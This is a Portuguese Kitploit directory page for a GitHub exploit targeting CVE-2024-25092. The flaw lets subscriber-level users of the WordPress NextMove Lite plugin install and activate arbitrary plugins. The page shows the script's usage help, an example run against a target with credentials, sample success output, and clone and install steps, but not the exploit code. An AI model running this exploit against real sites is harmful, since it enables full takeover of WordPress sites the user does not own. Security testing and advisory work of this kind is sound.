Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2024-25092 — Plugin WordPress NextMove Lite <= 2.17.0 - vulnerabilidade de instalação/ativação arbitrária de plugin por Subscriber+ | Kitploit
Ferramentas/GitHubGitHub/nxploited/cve-2024-25092
Geração de PayloadsAnálise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoAprendizado e Educação
GitHubnxploited/cve-2024-25092

CVE-2024-25092

Plugin WordPress NextMove Lite <= 2.17.0 - vulnerabilidade de instalação/ativação arbitrária de plugin por Subscriber+

Ver Repositório
1há 1 anoAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2024-25092 Exploit

Visão Geral

CVE-2024-25092 é uma vulnerabilidade de alta gravidade que afeta o plugin NextMove Lite do WordPress (versões <= 2.17.0). Essa vulnerabilidade permite que um usuário com nível assinante (subscriber+) instale e ative plugins arbitrários em um site WordPress devido à ausência de verificações de autorização.

Detalhes

  • Publicado: 2024-06-09
  • Atualizado: 2024-06-09
  • Gravidade: Alta (Pontuação CVSS: 8.8)
  • CWE: CWE-862 - Autorização Ausente

Vetor CVSS

  • Versão do CVSS: 3.1
  • String do Vetor: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Descrição

O plugin NextMove Lite da XLPlugins para WordPress possui uma vulnerabilidade de autorização ausente, permitindo que usuários autenticados com permissões de nível assinante ou superior realizem instalações e ativações arbitrárias de plugins. Isso pode levar ao comprometimento total do site WordPress.

Script de Exploit

O script Python fornecido automatiza a exploração desta vulnerabilidade, fazendo login no site WordPress e instalando um plugin especificado.

Uso

root@kitploit:~
usage: CVE-2024-25092.py [-h] -u URL -un USERNAME -p PASSWORD [-pl PLUGIN]

Exploit script for CVE-2024-25092 By Nxploit Khaled Alenazi.

options:
  -h, --help            show this help message and exit
  -u URL, --url URL     Target URL
  -un USERNAME, --username USERNAME
                        Username
  -p PASSWORD, --password PASSWORD
                        Password
  -pl PLUGIN, --plugin PLUGIN
                        Plugin to install (default: cart-for-woocommerce)

Exemplo

root@kitploit:~
python CVE-2024-25092.py -u http://example.com -un admin -p password -pl custom-plugin

Saída

root@kitploit:~
Logged in successfully.
Site is vulnerable... Exploiting and uploading plugin
Plugin 'cart-for-woocommerce' installed and activated successfully.

Detalhes do Script

Requisitos

  • Python 3.x
  • biblioteca requests

Instalação

  1. Clone o repositório:

    root@kitploit:~
    git clone https://github.com/Nxploited/CVE-2024-25092.git
    cd CVE-2024-25092
    
  2. Instale os pacotes Python necessários:

    root@kitploit:~
    pip install requests
    

Aviso Legal

Este script destina-se apenas a fins educacionais. Use-o com responsabilidade e somente em sistemas para os quais você tenha permissão explícita. O uso não autorizado deste script é ilegal e antiético.

Baixar ferramenta